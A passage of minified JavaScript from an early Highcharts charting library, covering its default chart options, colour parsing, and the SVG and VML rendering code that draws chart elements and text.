e,f=b[jd](),g=b[kd](),h=b[Cc](),i=b[Rc](),j=b[Sc](),m=Xa.lang,v=m.weekdays;b={a:v[g].substr(0,3),A:v[g],d:d(h), +e:h,b:m.shortMonths[i],B:m.months[i],m:d(i+1),y:j.toString().substr(2,2),Y:j,H:d(f),I:d(f%12||12),l:f%12||12,M:d(b[id]()),p:f<12?"AM":"PM",P:f<12?"am":"pm",S:d(b.getSeconds())};for(e in b)a=a.replace("%"+e,b[e]);return c?a.substr(0,1).toUpperCase()+a.substr(1):a};Gd.prototype={wrapColor:function(a){if(this.color>=a)this.color=0},wrapSymbol:function(a){if(this.symbol>=a)this.symbol=0}};Nc={init:function(a,b,c){b=b||"";var d=a.shift,e=b.indexOf("C")>-1,f=e?7:3,g;b=b.split(" ");c=[].concat(c);var h, +i,j=function(m){for(g=m.length;g--;)m[g]===Za&&m.splice(g+1,0,m[g+1],m[g+2],m[g+1],m[g+2])};if(e){j(b);j(c)}if(a.isArea){h=b.splice(b.length-6,6);i=c.splice(c.length-6,6)}if(d){c=[].concat(c).splice(0,f).concat(c);a.shift=false}if(b.length)for(a=c.length;b.length<a;){d=[].concat(b).splice(b.length-f,f);if(e){d[f-6]=d[f-2];d[f-5]=d[f-1]}b=b.concat(d)}if(h){b=b.concat(h);c=c.concat(i)}return[b,c]},step:function(a,b,c,d){var e=[],f=a.length;if(c===1)e=d;else if(f===b.length&&c<1)for(;f--;){d=parseFloat(a[f]); +e[f]=isNaN(d)?a[f]:c*parseFloat(b[f]-d)+d}else e=b;return e}};ma&&ma.init&&ma.init(Nc);if(!ma&&db.jQuery){var Mb=jQuery;u=function(a,b){for(var c=0,d=a.length;c<d;c++)if(b.call(a[c],a[c],c,a)===false)return c};Dd=Mb.grep;tc=function(a,b){for(var c=[],d=0,e=a.length;d<e;d++)c[d]=b.call(a[d],a[d],d,a);return c};Ca=function(){var a=arguments;return Mb.extend(true,null,a[0],a[1],a[2],a[3])};Qa=function(a,b,c){Mb(a).bind(b,c)};pb=function(a,b,c){var d=ua.removeEventListener?"removeEventListener":"detachEvent"; +if(ua[d]&&!a[d])a[d]=function(){};Mb(a).unbind(b,c)};Pa=function(a,b,c,d){var e=Mb.Event(b),f="detached"+b;sa(e,c);if(a[b]){a[f]=a[b];a[b]=null}Mb(a).trigger(e);if(a[f]){a[b]=a[f];a[f]=null}d&&!e.isDefaultPrevented()&&d(e)};gd=function(a,b,c){var d=Mb(a);if(b.d){a.toD=b.d;b.d=1}d.stop();d.animate(b,c)};Hc=function(a){Mb(a).stop()};Mb.extend(Mb.easing,{easeOutQuad:function(a,b,c,d,e){return-d*(b/=e)*(b-2)+c}});var de=jQuery.fx,ee=de.step;u(["cur","_default","width","height"],function(a,b){var c=b? +ee:de.prototype,d=c[a],e;if(d)c[a]=function(f){f=b?f:this;e=f.elem;return e.attr?e.attr(f.prop,f.now):d.apply(this,arguments)}});ee.d=function(a){var b=a.elem;if(!a.started){var c=Nc.init(b,b.d,b.toD);a.start=c[0];a.end=c[1];a.started=true}b.attr("d",Nc.step(a.start,a.end,a.pos,b.toD))}}ma={enabled:true,align:"center",x:0,y:15,style:{color:"#666",fontSize:"11px",lineHeight:"14px"}};Xa={colors:["#4572A7","#AA4643","#89A54E","#80699B","#3D96AE","#DB843D","#92A8CD","#A47D7C","#B5CA92"],symbols:["circle", +"diamond","square","triangle","triangle-down"],lang:{loading:"Loading...",months:["January","February","March","April","May","June","July","August","September","October","November","December"],shortMonths:["Jan","Feb","Mar","Apr","May","June","Jul","Aug","Sep","Oct","Nov","Dec"],weekdays:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],decimalPoint:".",resetZoom:"Reset zoom",resetZoomTitle:"Reset zoom level 1:1",thousandsSep:","},global:{useUTC:true},chart:{borderColor:"#4572A7", +borderRadius:5,defaultSeriesType:"line",ignoreHiddenSeries:true,spacingTop:10,spacingRight:10,spacingBottom:15,spacingLeft:10,style:{fontFamily:'"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif',fontSize:"12px"},backgroundColor:"#FFFFFF",plotBorderColor:"#C0C0C0"},title:{text:"Chart title",align:"center",y:15,style:{color:"#3E576F",fontSize:"16px"}},subtitle:{text:"",align:"center",y:30,style:{color:"#6D869F"}},plotOptions:{line:{allowPointSelect:false,showCheckbox:false, +animation:{duration:1E3},events:{},lineWidth:2,shadow:true,marker:{enabled:true,lineWidth:0,radius:4,lineColor:"#FFFFFF",states:{hover:{},select:{fillColor:"#FFFFFF",lineColor:"#000000",lineWidth:2}}},point:{events:{}},dataLabels:Ca(ma,{enabled:false,y:-6,formatter:function(){return this.y}}),showInLegend:true,states:{hover:{marker:{}},select:{marker:{}}},stickyTracking:true}},labels:{style:{position:ic,color:"#3E576F"}},legend:{enabled:true,align:"center",layout:"horizontal",labelFormatter:function(){return this.name}, +borderWidth:1,borderColor:"#909090",borderRadius:5,shadow:false,style:{padding:"5px"},itemStyle:{cursor:"pointer",color:"#3E576F"},itemHoverStyle:{cursor:"pointer",color:"#000000"},itemHiddenStyle:{color:"#C0C0C0"},itemCheckboxStyle:{position:ic,width:"13px",height:"13px"},symbolWidth:16,symbolPadding:5,verticalAlign:"bottom",x:0,y:0},loading:{hideDuration:100,labelStyle:{fontWeight:"bold",position:Xd,top:"1em"},showDuration:100,style:{position:ic,backgroundColor:"white",opacity:0.5,textAlign:"center"}}, +tooltip:{enabled:true,backgroundColor:"rgba(255, 255, 255, .85)",borderWidth:2,borderRadius:5,shadow:true,snap:Kb?25:10,style:{color:"#333333",fontSize:"12px",padding:"5px",whiteSpace:"nowrap"}},toolbar:{itemStyle:{color:"#4572A7",cursor:"pointer"}},credits:{enabled:true,text:"Highcharts.com",href:"http://www.highcharts.com",position:{align:"right",x:-10,verticalAlign:"bottom",y:-5},style:{cursor:"pointer",color:"#909090",fontSize:"10px"}}};var Yc={dateTimeLabelFormats:{second:"%H:%M:%S",minute:"%H:%M", +hour:"%H:%M",day:"%e. %b",week:"%e. %b",month:"%b '%y",year:"%Y"},endOnTick:false,gridLineColor:"#C0C0C0",labels:ma,lineColor:"#C0D0E0",lineWidth:1,max:null,min:null,minPadding:0.01,maxPadding:0.01,minorGridLineColor:"#E0E0E0",minorGridLineWidth:1,minorTickColor:"#A0A0A0",minorTickLength:2,minorTickPosition:"outside",startOfWeek:1,startOnTick:false,tickColor:"#C0D0E0",tickLength:5,tickmarkPlacement:"between",tickPixelInterval:100,tickPosition:"outside",tickWidth:1,title:{align:"middle",style:{color:"#6D869F", +fontWeight:"bold"}},type:"linear"},od=Ca(Yc,{endOnTick:true,gridLineWidth:1,tickPixelInterval:72,showLastLabel:true,labels:{align:"right",x:-8,y:3},lineWidth:0,maxPadding:0.05,minPadding:0.05,startOnTick:true,tickWidth:0,title:{rotation:270,text:"Y-values"},stackLabels:{enabled:false,formatter:function(){return this.total},style:ma.style}}),ie={labels:{align:"right",x:-8,y:null},title:{rotation:270}},he={labels:{align:"left",x:8,y:null},title:{rotation:90}},Td={labels:{align:"center",x:0,y:14},title:{rotation:0}}, +ge=Ca(Td,{labels:{y:-5}}),xb=Xa.plotOptions;ma=xb.line;xb.spline=Ca(ma);xb.scatter=Ca(ma,{lineWidth:0,states:{hover:{lineWidth:0}}});xb.area=Ca(ma,{});xb.areaspline=Ca(xb.area);xb.column=Ca(ma,{borderColor:"#FFFFFF",borderWidth:1,borderRadius:0,groupPadding:0.2,marker:null,pointPadding:0.1,minPointLength:0,states:{hover:{brightness:0.1,shadow:false},select:{color:"#C0C0C0",borderColor:"#000000",shadow:false}},dataLabels:{y:null,verticalAlign:null}});xb.bar=Ca(xb.column,{dataLabels:{align:"left",x:5, +y:0}});xb.pie=Ca(ma,{borderColor:"#FFFFFF",borderWidth:1,center:["50%","50%"],colorByPoint:true,dataLabels:{distance:30,enabled:true,formatter:function(){return this.point.name},y:5},legendType:"point",marker:null,size:"75%",showInLegend:false,slicedOffset:10,states:{hover:{brightness:0.1,shadow:false}}});Id();var bc=function(a){var b=[],c;(function(d){if(c=/rgba\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]?(?:\.[0-9]+)?)\s*\)/.exec(d))b=[ja(c[1]),ja(c[2]),ja(c[3]),parseFloat(c[4], +10)];else if(c=/#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/.exec(d))b=[ja(c[1],16),ja(c[2],16),ja(c[3],16),1]})(a);return{get:function(d){return b&&!isNaN(b[0])?d==="rgb"?"rgb("+b[0]+","+b[1]+","+b[2]+")":d==="a"?b[3]:"rgba("+b.join(",")+")":a},brighten:function(d){if(lc(d)&&d!==0){var e;for(e=0;e<3;e++){b[e]+=ja(d*255);if(b[e]<0)b[e]=0;if(b[e]>255)b[e]=255}}return this},setOpacity:function(d){b[3]=d;return this}}};Uc.prototype={init:function(a,b){this.element=ua.createElementNS("http://www.w3.org/2000/svg", +b);this.renderer=a},animate:function(a,b,c){if(b=A(b,Bc,true)){b=Ca(b);if(c)b.complete=c;gd(this,a,b)}else{this.attr(a);c&&c()}},attr:function(a,b){var c,d,e,f,g=this.element,h=g.nodeName,i=this.renderer,j,m=this.shadows,v=this.htmlNode,P,T=this;if(Sb(a)&&K(b)){c=a;a={};a[c]=b}if(Sb(a)){c=a;if(h==="circle")c={x:"cx",y:"cy"}[c]||c;else if(c==="strokeWidth")c="stroke-width";T=Ga(g,c)||this[c]||0;if(c!=="d"&&c!=="visibility")T=parseFloat(T)}else for(c in a){j=false;d=a[c];if(c==="d"){if(d&&d.join)d= +d.join(" ");if(/(NaN| {2}|^$)/.test(d))d="M 0 0";this.d=d}else if(c==="x"&&h==="text"){for(e=0;e<g.childNodes.length;e++){f=g.childNodes[e];Ga(f,"x")===Ga(g,"x")&&Ga(f,"x",d)}if(this.rotation)Ga(g,"transform","rotate("+this.rotation+" "+d+" "+ja(a.y||Ga(g,"y"))+")")}else if(c==="fill")d=i.color(d,g,c);else if(h==="circle"&&(c==="x"||c==="y"))c={x:"cx",y:"cy"}[c]||c;else if(c==="translateX"||c==="translateY"||c==="rotation"||c==="verticalAlign"){this[c]=d;this.updateTransform();j=true}else if(c=== +"stroke")d=i.color(d,g,c);else if(c==="dashstyle"){c="stroke-dasharray";d=d&&d.toLowerCase();if(d==="solid")d=jb;else if(d){d=d.replace("shortdashdotdot","3,1,1,1,1,1,").replace("shortdashdot","3,1,1,1").replace("shortdot","1,1,").replace("shortdash","3,1,").replace("longdash","8,3,").replace(/dot/g,"1,3,").replace("dash","4,3,").replace(/,$/,"").split(",");for(e=d.length;e--;)d[e]=ja(d[e])*a["stroke-width"];d=d.join(",")}}else if(c==="isTracker")this[c]=d;else if(c==="width")d=ja(d);else if(c=== +"align"){c="text-anchor";d={left:"start",center:"middle",right:"end"}[d]}else if(c==="title"){e=ua.createElementNS("http://www.w3.org/2000/svg","title");e.appendChild(ua.createTextNode(d));g.appendChild(e)}if(c==="strokeWidth")c="stroke-width";if(Ud&&c==="stroke-width"&&d===0)d=1.0E-6;if(this.symbolName&&/^(x|y|r|start|end|innerR)/.test(c)){if(!P){this.symbolAttr(a);P=true}j=true}if(m&&/^(width|height|visibility|x|y|d)$/.test(c))for(e=m.length;e--;)Ga(m[e],c,d);if((c==="width"||c==="height")&&h=== +"rect"&&d<0)d=0;if(c==="text"){this.textStr=d;this.added&&i.buildText(this)}else j||Ga(g,c,d);if(v&&(c==="x"||c==="y"||c==="translateX"||c==="translateY"||c==="visibility")){e=v.length?v:[this];f=e.length;var Y;for(Y=0;Y<f;Y++){v=e[Y];j=v.getBBox();v=v.htmlNode;Ja(v,sa(this.styles,{left:j.x+(this.translateX||0)+Ua,top:j.y+(this.translateY||0)+Ua}));c==="visibility"&&Ja(v,{visibility:d})}}}return T},symbolAttr:function(a){var b=this;u(["x","y","r","start","end","width","height","innerR"],function(c){b[c]= +A(a[c],b[c])});b.attr({d:b.renderer.symbols[b.symbolName](W(b.x*2)/2,W(b.y*2)/2,b.r,{start:b.start,end:b.end,width:b.width,height:b.height,innerR:b.innerR})})},clip:function(a){return this.attr("clip-path","url("+this.renderer.url+"#"+a.id+")")},crisp:function(a,b,c,d,e){var f,g={},h={},i;a=a||this.strokeWidth||0;i=a%2/2;h.x=lb(b||this.x||0)+i;h.y=lb(c||this.y||0)+i;h.width=lb((d||this.width||0)-2*i);h.height=lb((e||this.height||0)-2*i);h.strokeWidth=a;for(f in h)if(this[f]!==h[f])this[f]=g[f]=h[f]; +return g},css:function(a){var b=this.element;b=a&&a.width&&b.nodeName==="text";var c,d="",e=function(f,g){return"-"+g.toLowerCase()};if(a&&a.color)a.fill=a.color;this.styles=a=sa(this.styles,a);if(Pc&&!Lc){b&&delete a.width;Ja(this.element,a)}else{for(c in a)d+=c.replace(/([A-Z])/g,e)+":"+a[c]+";";this.attr({style:d})}b&&this.added&&this.renderer.buildText(this);return this},on:function(a,b){var c=b;if(Kb&&a==="click"){a="touchstart";c=function(d){d.preventDefault();b()}}this.element["on"+a]=c;return this}, +translate:function(a,b){return this.attr({translateX:a,translateY:b})},invert:function(){this.inverted=true;this.updateTransform();return this},updateTransform:function(){var a=this.translateX||0,b=this.translateY||0,c=this.inverted,d=this.rotation,e=[];if(c){a+=this.attr("width");b+=this.attr("height")}if(a||b)e.push("translate("+a+","+b+")");if(c)e.push("rotate(90) scale(-1,1)");else d&&e.push("rotate("+d+" "+this.x+" "+this.y+")");e.length&&Ga(this.element,"transform",e.join(" "))},toFront:function(){var a= +this.element;a.parentNode.appendChild(a);return this},align:function(a,b,c){if(a){this.alignOptions=a;this.alignByTranslate=b;c||this.renderer.alignedObjects.push(this)}else{a=this.alignOptions;b=this.alignByTranslate}c=A(c,this.renderer);var d=a.align,e=a.verticalAlign,f=(c.x||0)+(a.x||0),g=(c.y||0)+(a.y||0),h={};if(/^(right|center)$/.test(d))f+=(c.width-(a.width||0))/{right:1,center:2}[d];h[b?"translateX":"x"]=W(f);if(/^(bottom|middle)$/.test(e))g+=(c.height-(a.height||0))/({bottom:1,middle:2}[e]|| +1);h[b?"translateY":"y"]=W(g);this[this.placed?"animate":"attr"](h);this.placed=true;this.alignAttr=h;return this},getBBox:function(){var a,b,c,d=this.rotation,e=d*ae;try{a=sa({},this.element.getBBox())}catch(f){a={width:0,height:0}}b=a.width;c=a.height;if(d){a.width=bb(c*Cb(e))+bb(b*rb(e));a.height=bb(c*rb(e))+bb(b*Cb(e))}return a},show:function(){return this.attr({visibility:Ab})},hide:function(){return this.attr({visibility:ob})},add:function(a){var b=this.renderer,c=a||b,d=c.element||b.box,e= +d.childNodes,f=this.element,g=Ga(f,"zIndex");this.parentInverted=a&&a.inverted;this.textStr!==undefined&&b.buildText(this);if(a&&this.htmlNode){if(!a.htmlNode)a.htmlNode=[];a.htmlNode.push(this)}if(g){c.handleZ=true;g=ja(g)}if(c.handleZ)for(c=0;c<e.length;c++){a=e[c];b=Ga(a,"zIndex");if(a!==f&&(ja(b)>g||!K(g)&&K(b))){d.insertBefore(f,a);return this}}d.appendChild(f);this.added=true;return this},safeRemoveChild:function(a){var b=a.parentNode;b&&b.removeChild(a)},destroy:function(){var a=this,b=a.element|| +{},c=a.shadows,d,e;b.onclick=b.onmouseout=b.onmouseover=b.onmousemove=null;Hc(a);if(a.clipPath)a.clipPath=a.clipPath.destroy();if(a.stops){for(e=0;e<a.stops.length;e++)a.stops[e]=a.stops[e].destroy();a.stops=null}a.safeRemoveChild(b);c&&u(c,function(f){a.safeRemoveChild(f)});nc(a.renderer.alignedObjects,a);for(d in a)delete a[d];return null},empty:function(){for(var a=this.element,b=a.childNodes,c=b.length;c--;)a.removeChild(b[c])},shadow:function(a,b){var c=[],d,e,f=this.element,g=this.parentInverted? +"(-1,-1)":"(1,1)";if(a){for(d=1;d<=3;d++){e=f.cloneNode(0);Ga(e,{isShadow:"true",stroke:"rgb(0, 0, 0)","stroke-opacity":0.05*d,"stroke-width":7-2*d,transform:"translate"+g,fill:jb});b?b.element.appendChild(e):f.parentNode.insertBefore(e,f);c.push(e)}this.shadows=c}return this}};var ed=function(){this.init.apply(this,arguments)};ed.prototype={Element:Uc,init:function(a,b,c,d){var e=location,f;f=this.createElement("svg").attr({xmlns:"http://www.w3.org/2000/svg",version:"1.1"});a.appendChild(f.element); +this.box=f.element;this.boxWrapper=f;this.alignedObjects=[];this.url=Pc?"":e.href.replace(/#.*?$/,"");this.defs=this.createElement("defs").add();this.forExport=d;this.gradients=[];this.setSize(b,c,false)},destroy:function(){var a,b=this.gradients,c=this.defs;this.box=null;this.boxWrapper=this.boxWrapper.destroy();if(b){for(a=0;a<b.length;a++)this.gradients[a]=b[a].destroy();this.gradients=null}if(c)this.defs=c.destroy();return this.alignedObjects=null},createElement:function(a){var b=new this.Element; +b.init(this,a);return b},buildText:function(a){for(var b=a.element,c=A(a.textStr,"").toString().replace(/<(b|strong)>/g,'<span style="font-weight:bold">').replace(/<(i|em)>/g,'<span style="font-style:italic">').replace(/<a/g,"<span").replace(/<\/(b|strong|i|em|a)>/g,"</span>").split(/<br.*?>/g),d=b.childNodes,e=/style="([^"]+)"/,f=/href="([^"]+)"/,g=Ga(b,"x"),h=a.styles,i=h&&a.useHTML&&!this.forExport,j=a.htmlNode,m=h&&ja(h.width),v=h&&h.lineHeight,P,T=d.length;T--;)b.removeChild(d[T]);m&&!a.added&& +this.box.appendChild(b);u(c,function(Y,H){var U,z=0,M;Y=Y.replace(/<span/g,"|||<span").replace(/<\/span>/g,"</span>|||");U=Y.split("|||");u(U,function(y){if(y!==""||U.length===1){var C={},Z=ua.createElementNS("http://www.w3.org/2000/svg","tspan");e.test(y)&&Ga(Z,"style",y.match(e)[1].replace(/(;| |^)color([ :])/,"$1fill$2"));if(f.test(y)){Ga(Z,"onclick",'location.href="'+y.match(f)[1]+'"');Ja(Z,{cursor:"pointer"})}y=(y.replace(/<(.|\n)*?>/g,"")||" ").replace(/</g,"<").replace(/>/g,">");Z.appendChild(ua.createTextNode(y)); +if(z)C.dx=3;else C.x=g;if(!z){if(H){!Lc&&a.renderer.forExport&&Ja(Z,{display:"block"});M=db.getComputedStyle&&ja(db.getComputedStyle(P,null).getPropertyValue("line-height"));if(!M||isNaN(M))M=v||P.offsetHeight||18;Ga(Z,"dy",M)}P=Z}Ga(Z,C);b.appendChild(Z);z++;if(m){y=y.replace(/-/g,"- ").split(" ");for(var Sa,Na=[];y.length||Na.length;){Sa=b.getBBox().width;C=Sa>m;if(!C||y.length===1){y=Na;Na=[];if(y.length){Z=ua.createElementNS("http://www.w3.org/2000/svg","tspan");Ga(Z,{dy:v||16,x:g});b.appendChild(Z); +if(Sa>m)m=Sa}}else{Z.removeChild(Z.firstChild);Na.unshift(y.pop())}y.length&&Z.appendChild(ua.createTextNode(y.join(" ").replace(/- /g,"-")))}}}})});if(i){if(!j)j=a.htmlNode=hb("span",null,sa(h,{position:ic,top:0,left:0}),this.box.parentNode);j.innerHTML=a.textStr;for(T=d.length;T--;)d[T].style.visibility=ob}},crispLine:function(a,b){if(a[1]===a[4])a[1]=a[4]=W(a[1])+b%2/2;if(a[2]===a[5])a[2]=a[5]=W(a[2])+b%2/2;return a},path:function(a){return this.createElement("path").attr({d:a,fill:jb})},circle:function(a, +b,c){a=Nb(a)?a:{x:a,y:b,r:c};return this.createElement("circle").attr(a)},arc:function(a,b,c,d,e,f){if(Nb(a)){b=a.y;c=a.r;d=a.innerR;e=a.start;f=a.end;a=a.x}return this.symbol("arc",a||0,b||0,c||0,{innerR:d||0,start:e||0,end:f||0})},rect:function(a,b,c,d,e,f){if(Nb(a)){b=a.y;c=a.width;d=a.height;e=a.r;f=a.strokeWidth;a=a.x}e=this.createElement("rect").attr({rx:e,ry:e,fill:jb});return e.attr(e.crisp(f,a,b,Ia(c,0),Ia(d,0)))},setSize:function(a,b,c){var d=this.alignedObjects,e=d.length;this.width=a; +this.height=b;for(this.boxWrapper[A(c,true)?"animate":"attr"]({width:a,height:b});e--;)d[e].align()},g:function(a){var b=this.createElement("g");return K(a)?b.attr({"class":vc+a}):b},image:function(a,b,c,d,e){var f={preserveAspectRatio:jb};arguments.length>1&&sa(f,{x:b,y:c,width:d,height:e});f=this.createElement("image").attr(f);f.element.setAttributeNS?f.element.setAttributeNS("http://www.w3.org/1999/xlink","href",a):f.element.setAttribute("hc-svg-href",a);return f},symbol:function(a,b,c,d,e){var f, +g=this.symbols[a];g=g&&g(W(b),W(c),d,e);var h=/^url\((.*?)\)$/,i;if(g){f=this.path(g);sa(f,{symbolName:a,x:b,y:c,r:d});e&&sa(f,e)}else if(h.test(a)){var j=function(m,v){m.attr({width:v[0],height:v[1]}).translate(-W(v[0]/2),-W(v[1]/2))};i=a.match(h)[1];a=be[i];f=this.image(i).attr({x:b,y:c});if(a)j(f,a);else{f.attr({width:0,height:0});hb("img",{onload:function(){j(f,be[i]=[this.width,this.height])},src:i})}}else f=this.circle(b,c,d);return f},symbols:{square:function(a,b,c){c=0.707*c;return[Za,a-c, +b-c,Ka,a+c,b-c,a+c,b+c,a-c,b+c,"Z"]},triangle:function(a,b,c){return[Za,a,b-1.33*c,Ka,a+c,b+0.67*c,a-c,b+0.67*c,"Z"]},"triangle-down":function(a,b,c){return[Za,a,b+1.33*c,Ka,a-c,b-0.67*c,a+c,b-0.67*c,"Z"]},diamond:function(a,b,c){return[Za,a,b-c,Ka,a+c,b,a,b+c,a-c,b,"Z"]},arc:function(a,b,c,d){var e=d.start,f=d.end-1.0E-6,g=d.innerR,h=rb(e),i=Cb(e),j=rb(f);f=Cb(f);d=d.end-e<kc?0:1;return[Za,a+c*h,b+c*i,"A",c,c,0,d,1,a+c*j,b+c*f,Ka,a+g*j,b+g*f,"A",g,g,0,d,0,a+g*h,b+g*i,"Z"]}},clipRect:function(a,b, +c,d){var e=vc+wd++,f=this.createElement("clipPath").attr({id:e}).add(this.defs);a=this.rect(a,b,c,d,0).add(f);a.id=e;a.clipPath=f;return a},color:function(a,b,c){var d,e=/^rgba/;if(a&&a.linearGradient){var f=this;b=a.linearGradient;c=vc+wd++;var g,h,i;g=f.createElement("linearGradient").attr({id:c,gradientUnits:"userSpaceOnUse",x1:b[0],y1:b[1],x2:b[2],y2:b[3]}).add(f.defs);f.gradients.push(g);g.stops=[];u(a.stops,function(j){if(e.test(j[1])){d=bc(j[1]);h=d.get("rgb");i=d.get("a")}else{h=j[1];i=1}j= +f.createElement("stop").attr({offset:j[0],"stop-color":h,"stop-opacity":i}).add(g);g.stops.push(j)});return"url("+this.url+"#"+c+")"}else if(e.test(a)){d=bc(a);Ga(b,c+"-opacity",d.get("a"));return d.get("rgb")}else{b.removeAttribute(c+"-opacity");return a}},text:function(a,b,c,d){var e=Xa.chart.style;b=W(A(b,0));c=W(A(c,0));a=this.createElement("text").attr({x:b,y:c,text:a}).css({fontFamily:e.fontFamily,fontSize:e.fontSize});a.x=b;a.y=c;a.useHTML=d;return a}};fd=ed;if(!Lc){Db=yb(Uc,{init:function(a, +b){var c=["<",b,' filled="f" stroked="f"'],d=["position: ",ic,";"];if(b==="shape"||b===Tb)d.push("left:0;top:0;width:10px;height:10px;");if(Mc)d.push("visibility: ",b===Tb?ob:Ab);c.push(' style="',d.join(""),'"/>');if(b){c=b===Tb||b==="span"||b==="img"?c.join(""):a.prepVML(c);this.element=hb(c)}this.renderer=a},add:function(a){var b=this.renderer,c=this.element,d=b.box;d=a?a.element||a:d;a&&a.inverted&&b.invertChild(c,d);Mc&&d.gVis===ob&&Ja(c,{visibility:ob});d.appendChild(c);this.added=true;this.alignOnAdd&& +this.updateTransform();return this},attr:function(a,b){var c,d,e,f=this.element||{},g=f.style,h=f.nodeName,i=this.renderer,j=this.symbolName,m,v,P=this.shadows,T=this;if(Sb(a)&&K(b)){c=a;a={};a[c]=b}if(Sb(a)){c=a;T=c==="strokeWidth"||c==="stroke-width"?this.strokeweight:this[c]}else for(c in a){d=a[c];m=false;if(j&&/^(x|y|r|start|end|width|height|innerR)/.test(c)){if(!v){this.symbolAttr(a);v=true}m=true}else if(c==="d"){d=d||[];this.d=d.join(" ");e=d.length;for(m=[];e--;)m[e]=lc(d[e])?W(d[e]*10)- +5:d[e]==="Z"?"x":d[e];d=m.join(" ")||"x";f.path=d;if(P)for(e=P.length;e--;)P[e].path=d;m=true}else if(c==="zIndex"||c==="visibility"){if(Mc&&c==="visibility"&&h==="DIV"){f.gVis=d;m=f.childNodes;for(e=m.length;e--;)Ja(m[e],{visibility:d});if(d===Ab)d=null}if(d)g[c]=d;m=true}else if(/^(width|height)$/.test(c)){this[c]=d;if(this.updateClipping){this[c]=d;this.updateClipping()}else g[c]=d;m=true}else if(/^(x|y)$/.test(c)){this[c]=d;if(f.tagName==="SPAN")this.updateTransform();else g[{x:"left",y:"top"}[c]]= +d}else if(c==="class")f.className=d;else if(c==="stroke"){d=i.color(d,f,c);c="strokecolor"}else if(c==="stroke-width"||c==="strokeWidth"){f.stroked=d?true:false;c="strokeweight";this[c]=d;if(lc(d))d+=Ua}else if(c==="dashstyle"){(f.getElementsByTagName("stroke")[0]||hb(i.prepVML(["<stroke/>"]),null,null,f))[c]=d||"solid";this.dashstyle=d;m=true}else if(c==="fill")if(h==="SPAN")g.color=d;else{f.filled=d!==jb?true:false;d=i.color(d,f,c);c="fillcolor"}else if(c==="translateX"||c==="translateY"||c==="rotation"|| +c==="align"){if(c==="align")c="textAlign";this[c]=d;this.updateTransform();m=true}else if(c==="text"){this.bBox=null;f.innerHTML=d;m=true}if(P&&c==="visibility")for(e=P.length;e--;)P[e].style[c]=d;if(!m)if(Mc)f[c]=d;else Ga(f,c,d)}return T},clip:function(a){var b=this,c=a.members;c.push(b);b.destroyClip=function(){nc(c,b)};return b.css(a.getCSS(b.inverted))},css:function(a){var b=this.element;if(b=a&&b.tagName==="SPAN"&&a.width){delete a.width;this.textWidth=b;this.updateTransform()}this.styles=sa(this.styles, +a);Ja(this.element,a);return this},safeRemoveChild:function(a){a.parentNode&&pc(a)},destroy:function(){this.destroyClip&&this.destroyClip();return Uc.prototype.destroy.apply(this)},empty:function(){for(var a=this.element.childNodes,b=a.length,c;b--;){c=a[b];c.parentNode.removeChild(c)}},getBBox:function(){var a=this.element,b=this.bBox;if(!b){if(a.nodeName==="text")a.style.position=ic;b=this.bBox={x:a.offsetLeft,y:a.offsetTop,width:a.offsetWidth,height:a.offsetHeight}}return b},on:function(a,b){this.element["on"+ +a]=function(){var c=db.event;c.target=c.srcElement;b(c)};return this},updateTransform:function(){if(this.added){var a=this,b=a.element,c=a.translateX||0,d=a.translateY||0,e=a.x||0,f=a.y||0,g=a.textAlign||"left",h={left:0,center:0.5,right:1}[g],i=g&&g!=="left";if(c||d)a.css({marginLeft:c,marginTop:d});a.inverted&&u(b.childNodes,function(z){a.renderer.invertChild(z,b)});if(b.tagName==="SPAN"){var j,m;c=a.rotation;var v;j=0;d=1;var P=0,T;v=ja(a.textWidth);var Y=a.xCorr||0,H=a.yCorr||0,U=[c,g,b.innerHTML, +a.textWidth].join(",");if(U!==a.cTT){if(K(c)){j=c*ae;d=rb(j);P=Cb(j);Ja(b,{filter:c?["progid:DXImageTransform.Microsoft.Matrix(M11=",d,", M12=",-P,", M21=",P,", M22=",d,", sizingMethod='auto expand')"].join(""):jb})}j=b.offsetWidth;m=b.offsetHeight;if(j>v){Ja(b,{width:v+Ua,display:"block",whiteSpace:"normal"});j=v}v=W((ja(b.style.fontSize)||12)*1.2);Y=d<0&&-j;H=P<0&&-m;T=d*P<0;Y+=P*v*(T?1-h:h);H-=d*v*(c?T?h:1-h:1);if(i){Y-=j*h*(d<0?-1:1);if(c)H-=m*h*(P<0?-1:1);Ja(b,{textAlign:g})}a.xCorr=Y;a.yCorr= +H}Ja(b,{left:e+Y,top:f+H});a.cTT=U}}else this.alignOnAdd=true},shadow:function(a,b){var c=[],d,e=this.element,f=this.renderer,g,h=e.style,i,j=e.path;if(j&&typeof j.value!=="string")j="x";if(a){for(d=1;d<=3;d++){i=['<shape isShadow="true" strokeweight="',7-2*d,'" filled="false" path="',j,'" coordsize="100,100" style="',e.style.cssText,'" />'];g=hb(f.prepVML(i),null,{left:ja(h.left)+1,top:ja(h.top)+1});i=['<stroke color="black" opacity="',0.05*d,'"/>'];hb(f.prepVML(i),null,null,g);b?b.element.appendChild(g): +e.parentNode.insertBefore(g,e);c.push(g)}this.shadows=c}return this}});ma=function(){this.init.apply(this,arguments)};ma.prototype=Ca(ed.prototype,{Element:Db,isIE8:yc.indexOf("MSIE 8.0")>-1,init:function(a,b,c){var d;this.alignedObjects=[];d=this.createElement(Tb);a.appendChild(d.element);this.box=d.element;this.boxWrapper=d;this.setSize(b,c,false);if(!ua.namespaces.hcv){ua.namespaces.add("hcv","urn:schemas-microsoft-com:vml");ua.createStyleSheet().cssText="hcv\\:fill, hcv\\:path, hcv\\:shape, hcv\\:stroke{ behavior:url(#default#VML); display: inline-block; } "}}, +clipRect:function(a,b,c,d){var e=this.createElement();return sa(e,{members:[],left:a,top:b,width:c,height:d,getCSS:function(f){var g=this.top,h=this.left,i=h+this.width,j=g+this.height;g={clip:"rect("+W(f?h:g)+"px,"+W(f?j:i)+"px,"+W(f?i:j)+"px,"+W(f?g:h)+"px)"};!f&&Mc&&sa(g,{width:i+Ua,height:j+Ua});return g},updateClipping:function(){u(e.members,function(f){f.css(e.getCSS(f.inverted))})}})},color:function(a,b,c){var d,e=/^rgba/;if(a&&a.linearGradient){var f,g,h=a.linearGradient,i,j,m,v;u(a.stops, 